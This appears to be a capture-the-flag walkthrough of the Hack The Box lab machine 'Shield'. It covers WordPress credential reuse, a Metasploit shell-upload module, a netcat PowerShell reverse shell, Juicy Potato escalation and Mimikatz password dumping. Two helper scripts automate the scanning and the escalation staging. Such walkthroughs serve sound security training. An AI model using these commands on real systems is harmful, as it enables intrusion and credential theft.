HTB Starting point – Shield

$ ./portScan.sh

[+] 10.10.10.29 scan started...
[-] Open ports : 80,3306 found

Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-09 19:58 CEST
Nmap scan report for 10.10.10.29
Host is up (0.044s latency).

PORT     STATE SERVICE VERSION
80/tcp   open  http    Microsoft IIS httpd 10.0
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows Server
3306/tcp open  mysql   MySQL (unauthorized)
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.69 seconds
[+] 10.10.10.29 scan finished...
  • Port 80 is open (Microsoft IIS 10.0). Port 3306 is MySQL but rejects unauthenticated connections, so the web server is the way in.
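The portScan.sh wrapper used above is not shown in the post. As an added example (my own script, not the author's), here is a bash equivalent of that two-stage approach: a full TCP sweep with grepable output, the open ports pulled out of it, then version detection on just those ports. It assumes nmap is installed and takes the target address as its only argument.

```shell
#!/usr/bin/env bash
# Added example, not the portScan.sh from the write-up (which is not shown).
# Stage 1 sweeps all 65535 TCP ports with grepable output, stage 2 runs
# default scripts and version detection only on the ports found open.
# Assumption: nmap is installed; the target is $1 (10.10.10.29 in the post).

# Read nmap grepable (-oG) output on stdin and return the open TCP ports as a
# sorted, comma-separated list such as "80,3306" (empty when nothing is open).
open_ports_from_gnmap() {
    grep -o '[0-9]*/open/tcp' | cut -d/ -f1 | sort -n -u | paste -s -d , -
}

# Run both stages and print the same status lines seen in the write-up.
port_scan() {
    local target=$1
    echo "[+] $target scan started..."
    local ports
    ports=$(nmap -p- --min-rate 1000 -T4 -oG - "$target" | open_ports_from_gnmap)
    if [ -z "$ports" ]; then
        echo "[-] No open ports found"
        return 1
    fi
    echo "[-] Open ports : $ports found"
    nmap -sC -sV -p "$ports" "$target"
    echo "[+] $target scan finished..."
}

# Usage: ./portScan.sh 10.10.10.29  (only runs when executed, not when sourced)
if [ "${BASH_SOURCE[0]}" = "$0" ] && [ $# -gt 0 ]; then
    port_scan "$1"
fi
```

The sweep uses `-oG -` so the port list is parsed from a stable format instead of nmap's human-readable table; `--min-rate` keeps a full-range scan on a lab box down to seconds, but drop it on anything fragile.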

Let’s try to see what’s inside…

$ gobuster dir -u http://10.10.10.29/wordpress -w /usr/share/wordlists/dirb/common.txt

===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.10.29/wordpress
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirb/common.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2020/05/11 23:20:50 Starting gobuster
===============================================================
/index.php (Status: 301)
/wp-admin (Status: 301)
/wp-content (Status: 301)
/wp-includes (Status: 301)
===============================================================
2020/05/11 23:21:14 Finished
===============================================================
  • There is a WordPress instance under /wordpress.

http://10.10.10.29/wordpress/

The usual WordPress login page is wp-login.php:

http://10.10.10.29/wordpress/wp-login.php

  • Following the rule from the previous machine (reuse credentials you have already found), admin/P@s5w0rd! works.

That gets us into the WordPress dashboard as an administrator.

Let’s use the wp_admin_shell_upload Metasploit module to get a working shell: with admin credentials it uploads a malicious plugin and calls it, which gives a PHP Meterpreter running as the web server’s account.

$ msfconsole
msf5 > use exploit/unix/webapp/wp_admin_shell_upload

What do we need to use this exploit?

msf5 exploit(unix/webapp/wp_admin_shell_upload) > options

Module options (exploit/unix/webapp/wp_admin_shell_upload):

  Name       Current Setting  Required  Description
  ----       ---------------  --------  -----------
  PASSWORD                    yes       The WordPress password to authenticate with
  Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
  RPORT      80               yes       The target port (TCP)
  SSL        false            no        Negotiate SSL/TLS for outgoing connections
  TARGETURI  /                yes       The base path to the wordpress application
  USERNAME                    yes       The WordPress username to authenticate with
  VHOST                       no        HTTP server virtual host

Exploit target:
  Id  Name
  --  ----
  0   WordPress

Set USERNAME and PASSWORD to the credentials above, RHOSTS to the target and, importantly, TARGETURI to /wordpress/ (the default / would not find the install); set LHOST for the reverse payload and run the exploit.

Done: we’ve got a Meterpreter shell.

Now we can upload a Netcat executable to get a more stable shell. The uploads directory is a good drop location because the web server account must be able to write there.

meterpreter > lcd /home/ruben/Downloads
meterpreter > cd C:/inetpub/wwwroot/wordpress/wp-content/uploads

meterpreter > upload nc.exe

From another local shell:

$ nc -lnvp 1234

meterpreter > sysinfo

Computer    : SHIELD
OS          : Windows NT SHIELD 10.0 build 14393 (Windows Server 2016) i586
Meterpreter : php/windows

The OS is Windows Server 2016 (build 14393), which is within the range hit by Rotten Potato. What actually matters, though, is the privilege set of the account running our PHP shell, not the OS version.

https://foxglovesecurity.com/2016/09/26/rotten-potato-privilege-escalation-from-service-accounts-to-system/

Juicy Potato is a variant of that exploit. A service account holding SeImpersonatePrivilege or SeAssignPrimaryTokenPrivilege triggers a DCOM activation (BITS in the original Rotten Potato; Juicy Potato lets you pick the CLSID), intercepts the resulting local NTLM authentication in a man-in-the-middle fashion, and impersonates the SYSTEM token it obtains, i.e. escalates to SYSTEM (the highest privileges). Check with whoami /priv from the PHP shell first; the IIS application pool identity normally has SeImpersonatePrivilege, and it does not need to be in the Enabled state.

https://github.com/ohpe/juicy-potato
https://ohpe.it/juicy-potato/

meterpreter > upload JuicyPotato.exe

[*] uploading  : JuicyPotato.exe -> JuicyPotato.exe
[*] Uploaded -1.00 B of 339.50 KiB (-0.0%): JuicyPotato.exe -> JuicyPotato.exe
[*] uploaded   : JuicyPotato.exe -> JuicyPotato.exe

Create a batch file that Juicy Potato will run as SYSTEM. It simply launches the uploaded nc.exe with a PowerShell reverse shell back to our box (start a Netcat listener on that port before running it):

echo START C:\inetpub\wwwroot\wordpress\wp-content\uploads\nc.exe -e powershell.exe 10.10.14.2 1111 > rf.bat
meterpreter > upload rf.bat

Run JuicyPotato.exe with the bat file as the program to execute (its -p option).
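Before pulling the trigger, a practitioner wants two things the post skips: a check that the account running the PHP shell actually holds one of the two required privileges, and a launcher written with Windows line endings. As an added example (my own helper, not the author's tooling), the bash script below does that on the attacker side and prints the JuicyPotato command to type into the Meterpreter shell. Assumptions: the uploads directory used throughout the post, LHOST 10.10.14.2 and port 1111 from rf.bat, JuicyPotato's own default BITS CLSID, and a whoami /priv dump saved to a local text file.

```shell
#!/usr/bin/env bash
# Added example (not from the write-up): prepare the Juicy Potato stage on the
# attacker box. Assumptions: nc.exe and JuicyPotato.exe already sit in the
# uploads directory below, and the CLSID is the BITS one JuicyPotato uses by
# default; pick another from the project's CLSID list if it fails on your build.

UPLOADS='C:\inetpub\wwwroot\wordpress\wp-content\uploads'
CLSID='{4991d34b-80a1-4291-83b6-3328366b9097}'   # BITS, JuicyPotato's default

# $1 is a file holding the output of `whoami /priv` copied from the target.
# Returns 0 when one of the two privileges Juicy Potato needs is listed,
# 1 otherwise. The State column does not matter: "Disabled" is still usable,
# the exploit enables the privilege itself.
has_potato_priv() {
    grep -Eiq '^Se(Impersonate|AssignPrimaryToken)Privilege[[:space:]]' "$1"
}

# Write the launcher batch file. START returns immediately so JuicyPotato does
# not block on it; CRLF line endings keep cmd.exe happy.
write_launcher() {
    local path=$1 lhost=$2 lport=$3
    printf 'START %s\\nc.exe -e powershell.exe %s %s\r\n' \
        "$UPLOADS" "$lhost" "$lport" > "$path"
}

# The command to run from the Meterpreter `shell` once rf.bat is uploaded:
# -l local COM listen port, -p program to run as SYSTEM, -t * try both
# CreateProcessWithTokenW and CreateProcessAsUser, -c CLSID to abuse.
juicy_command() {
    printf '%s\\JuicyPotato.exe -l 1337 -p %s\\rf.bat -t * -c %s\n' \
        "$UPLOADS" "$UPLOADS" "$CLSID"
}

# Usage: ./stage.sh 10.10.14.2 1111 [whoami_priv.txt]
if [ "${BASH_SOURCE[0]}" = "$0" ] && [ $# -ge 2 ]; then
    if [ -n "$3" ] && ! has_potato_priv "$3"; then
        echo "[-] neither SeImpersonate nor SeAssignPrimaryToken held, Potato will not work" >&2
        exit 1
    fi
    write_launcher rf.bat "$1" "$2"
    echo "Start your listener first:  nc -lnvp $2"
    echo "Then, in meterpreter:       upload rf.bat"
    echo "And from 'shell':           $(juicy_command)"
fi
```

If JuicyPotato reports that the CLSID is not usable, the fix is a different CLSID for that Windows build from the list on the project page, not a different privilege; if the privilege check fails, Potato-style escalation is simply off the table for that account.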

Now we’ve got another shell on the listener.
This time we are NT AUTHORITY\SYSTEM.

We can finally get the flag.

There’s a user called sandra, but no flag was found on her Desktop as usual.

At this point we already own the machine, but we can go a little further.

Run Mimikatz:

According to its GitHub description:

Mimikatz is a tool I’ve made to learn C and make some experiments with Windows security. It’s now well known to extract plaintexts passwords, hash, PIN code and Kerberos tickets from memory. Mimikatz can also perform pass-the-hash, pass-the-ticket or build Golden tickets.

https://github.com/gentilkiwi/mimikatz

Run privilege::debug and then sekurlsa::logonpasswords, which lists all available provider credentials. This usually shows the credentials of recently logged-on users and of the computer account; since we are SYSTEM, reading LSASS memory is not a problem.

Finally we obtain Sandra’s password.
